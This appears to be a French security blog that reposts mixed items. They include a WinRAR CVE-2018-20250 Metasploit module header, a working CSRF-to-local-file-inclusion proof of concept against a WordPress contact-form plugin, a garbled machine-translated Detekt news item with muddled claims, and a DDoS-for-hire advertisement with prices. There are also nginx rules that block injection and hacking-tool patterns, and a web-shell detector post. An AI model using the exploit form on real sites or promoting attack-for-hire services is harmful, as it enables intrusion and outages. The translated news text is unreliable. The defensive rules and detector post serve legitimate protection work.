RARLAB WinRAR 5.61 - ACE Format Input Validation Remote Code Execution (Metasploit)

Posted on dimanche 28 avril 2019 - 0 commentaires -

super(update_info(info,
      'Name'           => 'RARLAB WinRAR ACE Format Input Validation Remote Code Execution',
      'Description'    => %q{
        In WinRAR versions prior to and including 5.61, there is path traversal vulnerability
        when crafting the filename field of the ACE format (in UNACEV2.dll). When the filename
        field is manipulated with specific patterns, the destination (extraction) folder is
        ignored, thus treating the filename as an absolute path. This module will attempt to
        extract a payload to the startup folder of the current user. It is limited such that
        we can only go back one folder. Therefore, for this exploit to work properly, the user
        must extract the supplied RAR file from one folder within the user profile folder
        (e.g. Desktop or Downloads). User restart is required to gain a shell.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Nadav Grossman', # exploit discovery
          'Imran E. Dawoodjee <imrandawoodjee.infosec@gmail.com>' # Metasploit module
        ],
      'References'     =>
        [
          ['CVE', '2018-20250'],
          ['EDB', '46552'],
          ['BID', '106948'],
          ['URL', 'https://research.checkpoint.com/extracting-code-execution-from-winrar/'],
          ['URL', 'https://apidoc.roe.ch/acefile/latest/'],
          ['URL', 'http://www.hugi.scene.org/online/coding/hugi%2012%20-%20coace.htm'],
        ],
      'Platform'       => 'win',


source : https://www.exploit-db.com/exploits/46756

WordPress Plugin Contact Form Builder 1.0.67 - Cross-Site Request Forgery / Local File Inclusion

Posted on - 0 commentaires -

# Exploit Title: Contact Form Builder [CSRF → LFI]
# Date: 2019-03-17
# Exploit Author: Panagiotis Vagenas
# Vendor Homepage: http://web-dorado.com/
# Software Link: https://wordpress.org/plugins/contact-form-builder
# Version: 1.0.67
# Tested on: WordPress 5.1.1

Description
-----------

Plugin implements the following AJAX actions:

- `ContactFormMakerPreview`
- `ContactFormmakerwdcaptcha`
- `nopriv_ContactFormmakerwdcaptcha`
- `CFMShortcode`

All of them call the function `contact_form_maker_ajax`. This function
dynamicaly loads a file defined in `$_GET['action']` or
`$_POST['action']` if the former is not defined. Because of the way
WordPress defines the AJAX action a user could define the plugin action
in the `$_GET['action']` and AJAX action in `$_POST['action']`.
Leveraging that and the fact that no sanitization is performed on the
`$_GET['action']`, a malicious actor can perform a CSRF attack to load a
file using directory traversal thus leading to Local File Inclusion
vulnerability.
PoC
---

```html
<form method="post"
action="http://wp-csrf-new.test/wp-admin/admin-ajax.php?action=/../../../../../../index">
    <label>AJAX action:
        <select name="action">
                <option
value="ContactFormMakerPreview">ContactFormMakerPreview</option>
                <option
value="ContactFormmakerwdcaptcha">ContactFormmakerwdcaptcha</option>
                <option
value="nopriv_ContactFormmakerwdcaptcha">nopriv_ContactFormmakerwdcaptcha</option>
                <option value="CFMShortcode">CFMShortcode</option>
        </select>
    </label>
    <button type="submit" value="Submit">Submit</button>
</form>
```
source 
https://www.exploit-db.com/exploits/46734

NOUVEAU outil pour détecter GOUVERNEMENT DE SURVEILLANCE: Detekt (Agence Technique des Télécommunications tunisienne & A2T & ATT)

Posted on jeudi 20 novembre 2014 - 0 commentaires -




L'accès non autorisé et la surveillance sur les ordinateurs personnels par les gouvernements de les agences d'espionnage a suscité de vifs débats sur les droits plutôt qu'aux États de confidentialité de mesures de sécurité, recevant de grandes quantités d'attention des groupes internationaux des droits de l'homme.
Un grand nombre de documents, une valeur importante valeur, ont récemment fait surface, indiquant l'étendue de l'espionnage des activités sur les ordinateurs personnels par l'Agence américaine de sécurité nationale (NSA) et de leurs partenaires (Agence Technique des Télécommunications tunisienne & A2T & ATT ), y compris le Government Communications Headquarters du Royaume-Uni (GCHQ) et d'autres organismes internationaux de surveillance »liens.
Un groupe de droits de l'homme et les organisations de la technologie Amnesty International et "ont lancé un nouvel outil anti-espionnage, à la suite des préoccupations au sujet de la protection des libertés civiles des citoyens contre le gouvernement d'espionnage au nom de la sécurité nationale, qui est particulièrement répandue contre les journalistes et humain les militants des droits.
Le nouveau logiciel, Détecter, permettrait à ses utilisateurs de scanner leurs ordinateurs pour l'activité d'espionnage suspect. Détecté avertit ses utilisateurs lorsqu'une activité suspecte est identifiée et suggérer que l'utilisateur déconnecte le dispositif de l'Internet et l'arrête. Detekt, le premier logiciel anti-espionnage disponible pour le public, est disponible au téléchargement pour tous ceux qui craint que leur ordinateur a été victime de la surveillance du gouvernement, même si elle a été conçue pour protéger les journalistes et les militants des droits de l'homme.
Dans le cadre du lancement, Amnesty International aider et informer les militants dans le monde entier sur Detekt et analyser leurs appareils pour des signes de spyware.
«Les gouvernements sont de plus en plus recours à la technologie dangereuse et sophistiqué qui leur permet de lire des militants et des e-mails privés des journalistes et allumer à distance la caméra ou au microphone de son ordinateur pour enregistrer secrètement leurs activités. Ils utilisent la technologie dans une lâche tentative pour éviter les abus d'être exposé, », a déclaré Marek Marczynski, chef de militaire, de sécurité et de police à Amnesty International.

Africa Cyber Security Forum 2013 (ACSF 2013) à Hammamet (Tunisie) le 11 et le 12 novembre 2013 #ACSF2013 #ACSF http://www.acsf2013.org/

Posted on samedi 19 octobre 2013 - 0 commentaires -




Africa Cyber Security Forum 2013 (ACSF 2013) à Hammamet (Tunisie) le 11 et le 12 novembre 2013 #ACSF2013 #ACSFhttp://www.acsf2013.org/

Ddos testing / testing resistance to attacks / simulate hacker attacks

Posted on lundi 19 novembre 2012 - 0 commentaires -

Ddos testing / testing resistance to attacks / simulate hacker attacks




 We provide the service , which will test loads and to determine resistance to hacking attacks your websites, servers, legitimate means . DDoS attacks are very common today, and know how it can affect the performance of your site is not unimportant. You show us a target and we will organize DDoS attack on her. Any questions about ddos attacks ask, we will try to help you.


Suggest DDOS services to address the various sites, servers, and other Internet resources.

DDoS-attack (from the English. Distributed Denial of Service - a distributed denial of service attack, "denial of service").
The attack on the computer system in order to bring it to the full, that is, to create conditions under which legitimate users of the system can not access the provided system resources (servers), or that the access is difficult.

Service Features:
• Complete anonymity
• Service without the mediation
• Reasonable prices for excellent quality
• Preliminary test before ordering
• Continuous monitoring of the victim to
• Different types of attacks, including the different protocols and ports
• Return of funds in the event of failure or cancellation

Price of service:
• 3 $ - per hour
• $ 30 - per day
• from $ 150 - per week
• from $ 500 - per month
(price depends on the attacked target)

Methods of payment:
• WebMoney


CONTACTS: 

Nginx – Comment bloquer les attaques les plus courantes ?

Posted on dimanche 12 août 2012 - 0 commentaires -




Petite astuce si vous utilisez Nginx et que vous souhaitez vous prémunir simplement de la plupart des exploits, injections SQL, injections de fichiers, spam et pompeurs de bande passante et hackers aux user-agent plus que louche...

Il suffit de rajouter dans vos vhosts nginx la config suivante dans un conteneur server{}. Vous remarquerez probablement que la règle concernant wget est mise en commentaires.

C'est par précaution car souvent, les CMS que nous utilisons se servent de wget dans leurs jobs cron. Mais si ce n'est pas le cas pour vous, alors vous pouvez décommenter cette partie.



server {
    ## Block SQL injections
    set $block_sql_injections 0;
    if ($query_string ~ "union.*select.*\(") {
        set $block_sql_injections 1;
    }
    if ($query_string ~ "union.*all.*select.*") {
        set $block_sql_injections 1;
    }
    if ($query_string ~ "concat.*\(") {
        set $block_sql_injections 1;
    }
    if ($block_sql_injections = 1) {
        return 403;
    }
    ## Block file injections
    set $block_file_injections 0;
    if ($query_string ~ "[a-zA-Z0-9_]=http://") {
        set $block_file_injections 1;
    }
    if ($query_string ~ "[a-zA-Z0-9_]=(\.\.//?)+") {
        set $block_file_injections 1;
    }
    if ($query_string ~ "[a-zA-Z0-9_]=/([a-z0-9_.]//?)+") {
        set $block_file_injections 1;
    }
    if ($block_file_injections = 1) {
        return 403;
    }
    ## Block common exploits
    set $block_common_exploits 0;
    if ($query_string ~ "(<|%3C).*script.*(>|%3E)") {
        set $block_common_exploits 1;
    }
    if ($query_string ~ "GLOBALS(=|\[|\%[0-9A-Z]{0,2})") {
        set $block_common_exploits 1;
    }
    if ($query_string ~ "_REQUEST(=|\[|\%[0-9A-Z]{0,2})") {
        set $block_common_exploits 1;
    }
    if ($query_string ~ "proc/self/environ") {
        set $block_common_exploits 1;
    }
    if ($query_string ~ "mosConfig_[a-zA-Z_]{1,21}(=|\%3D)") {
        set $block_common_exploits 1;
    }
    if ($query_string ~ "base64_(en|de)code\(.*\)") {
        set $block_common_exploits 1;
    }
    if ($block_common_exploits = 1) {
        return 403;
    }
    ## Block spam
    set $block_spam 0;
    if ($query_string ~ "\b(ultram|unicauca|valium|viagra|vicodin|xanax|ypxaieo)\b") {
        set $block_spam 1;
    }
    if ($query_string ~ "\b(erections|hoodia|huronriveracres|impotence|levitra|libido)\b") {
        set $block_spam 1;
    }
    if ($query_string ~ "\b(ambien|blue\spill|cialis|cocaine|ejaculation|erectile)\b") {
        set $block_spam 1;
    }
    if ($query_string ~ "\b(lipitor|phentermin|pro[sz]ac|sandyauer|tramadol|troyhamby)\b") {
        set $block_spam 1;
    }
    if ($block_spam = 1) {
        return 403;
    }
    ## Block user agents
    set $block_user_agents 0;
    # Don't disable wget if you need it to run cron jobs!
    #if ($http_user_agent ~ "Wget") {
    #    set $block_user_agents 1;
    #}
    # Disable Akeeba Remote Control 2.5 and earlier
    if ($http_user_agent ~ "Indy Library") {
        set $block_user_agents 1;
    }
    # Common bandwidth hoggers and hacking tools.
    if ($http_user_agent ~ "libwww-perl") {
        set $block_user_agents 1;
    }
    if ($http_user_agent ~ "GetRight") {
        set $block_user_agents 1;
    }
    if ($http_user_agent ~ "GetWeb!") {
        set $block_user_agents 1;
    }
    if ($http_user_agent ~ "Go!Zilla") {
        set $block_user_agents 1;
    }
    if ($http_user_agent ~ "Download Demon") {
        set $block_user_agents 1;
    }
    if ($http_user_agent ~ "Go-Ahead-Got-It") {
        set $block_user_agents 1;
    }
    if ($http_user_agent ~ "TurnitinBot") {
        set $block_user_agents 1;
    }
    if ($http_user_agent ~ "GrabNet") {
        set $block_user_agents 1;
    }
    if ($block_user_agents = 1) {
        return 403;
    }
}


Une fois que c'est en place, n'oubliez pas de redémarrer Nginx.

/etc/init.d/nginx reload


Un détecteur de Web Shell de hackers pour votre serveur

Posted on - 0 commentaires -


Je ne sais pas si tout le monde ici sait exactement ce que sont les web shells comme C99 ou R57, mais je vais tenter de vous expliquer rapidement... Les web shell sont des scripts le plus souvent développé en PHP, ASP, ou CGI (mais y'en a dans tous les langages) qui permettent d’interagir via HTTP avec le système (c'est à dire le serveur).

Les pirates s'en servent pour, à partir d'une faille d'injection simple de fichier, avoir la main sur le serveur et à distance pouvoir gérer les fichiers, lancer des commandes, gérer le MySQL...etc. C'est comme s'ils avaient un SSH sous les yeux si vous préférez.



Peut être, avez vous, sans le savoir un de ces scripts de web shells qui tournent en ce moment même sur votre serveur ? Mais comment le savoir ?



Et bien pour cela, il existe un autre script (en PHP cette fois) qui s'appelle PHP Shell Detector et dont la fonction principale est de scanner votre serveur à la recherche justement de ces web shells dangereux. Pour cela, il se base sur un certain nombre de critères afin de déterminer une signature pour chaque shell.



Ensuite, à vous de voir pour faire le ménage !